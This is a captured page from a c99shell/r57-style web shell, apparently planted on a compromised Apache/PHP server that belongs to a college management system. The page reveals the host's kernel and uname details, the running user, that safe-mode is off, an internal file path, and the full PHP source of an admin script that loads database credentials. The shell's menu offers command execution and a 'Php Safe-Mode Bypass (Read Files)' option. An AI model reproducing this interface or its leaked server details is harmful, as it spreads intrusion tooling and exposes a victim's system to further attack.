Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/directorBCNU/admin/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php include_once("../../class/clsConnection.php"); include_once("../../class/clsDB.php"); include_once "../global.php"; include_once "../class/clsSysConfig.php"; include_once "../class/clsCollegeDetail.php"; $oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']); $oSys = new sysConfig($oC); $oCd = new collegedetail($oC); $oCd2 = new collegedetail($oC); $oSys->RSsysConfig(); $oSys->GetRecord(); if($data=file_get_contents($GLOBALS['SERVERPATH']."?fn=getCollege")){ list($size,$tmp)=split(';',$data); //find size $data=strstr($data,";"); //cut show size $data=substr($data,1); //cut ; $strsize=strlen($data); //compare strlen if($size==$strsize){ while($data!=''){ list($getcollege,$tmp) = split(";",$data); echo 'use===='.$getcollege.'<br>'; list($getcollegeID,$getcollegeName,$getcollegeAbbr,$getcollegeHost,$getcollegeType) = split(",",$getcollege); echo 'getcollegeID='.$getcollegeID.' getcollegeName='.$getcollegeName.' getcollegeAbbr='.$getcollegeAbbr.' getcollegeHost='.$getcollegeHost.' getcollegeType='.$getcollegeType.'<br>'; $oCd->SearchByKey($getcollegeID); if($oCd->GetRecord()==0){ $oCd->AddNew(); $oCd->cID=$oCd->GetNextCode(); $oCd->collegeID=$getcollegeID; }else{ $oCd->Edit(); $oCd->collegeID=$getcollegeID; } $oCd->collegeName=$getcollegeName; $oCd->collegeAbbr=$getcollegeAbbr; $oCd->collegeHost=$getcollegeHost; $oCd->collegeType=$getcollegeType; $oCd->Save(); list($ee,$data) = split($getcollege.";",$data); ?> <script language="JavaScript"> parent.location.href ="addcollege_c.php?r=3"; </script> <? } }else{ //error size ?> <script language="JavaScript"> parent.location.href ="addcollege_c.php?r=1"; </script> <? } }else{ //error return value ?> <script language="JavaScript"> parent.location.href ="addcollege_c.php?r=2"; </script> <? } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0056 ]-- |